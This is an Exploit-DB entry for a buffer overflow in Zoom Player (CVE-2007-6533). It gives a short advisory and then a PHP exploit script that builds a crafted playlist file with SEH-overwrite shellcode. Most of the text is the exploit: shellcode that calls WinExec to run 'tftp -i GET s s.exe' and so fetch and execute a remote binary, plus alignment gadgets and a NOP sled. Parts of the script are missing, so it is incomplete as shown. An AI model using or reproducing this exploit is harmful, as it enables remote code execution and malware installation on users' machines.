Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution

ID EDB-ID:30933
Type exploitdb
Reporter Luigi Auriemma
Modified 2007-12-24T00:00:00


Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution. CVE-2007-6533. Remote exploits for multiple platform

                                            source: http://www.securityfocus.com/bid/27007/info

Zoom Player is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application or to crash the application, denying further service to legitimate users.

This issue affects Zoom Player 6.00 beta 2 and all releases contained in the Zoom Player 5 branch.

  Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)
  by Nine:Situations:Group::surfista

  seems the same of http://secunia.com/advisories/28214/
  bug found by Luigi Auriemma
  no full working exploit out, so I made my test version
//original shellcode, 27 bytes + command
//re-encode with
//alpha2 --unicode ecx <sh.txt
$scode =
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3
"cmd /c tftp -i GET s s.exe && s && ".


       /* unicode preamble, alignment */
       "\x6e".                      //add byte ptr [esi],ch, nop equivalent [*]
       "\xd3\x45".                  //0x004500d3  unicode friendly pop - pop - ret, zplayer.exe
       "\x6e".                      //*
       "\x05\x7f\x4c".              //add eax,4c007f00h
       "\x6e".                      //*
       "\x2d\x59\x4c".              //sub eax,4c005900h
       "\x6e".                      //*
       "\x50".                      //push eax
       "\x6e".                      //*
       "\x59".                      //pop ecx
       str_repeat("\x6e\x90",0x7f). //nop
       "\x6e".                      //*
       "\x6a".                      //push 0, nop equivalent
if (!$_fp) { die("[:(] Failed to create file...");}
print("[:)] Done!");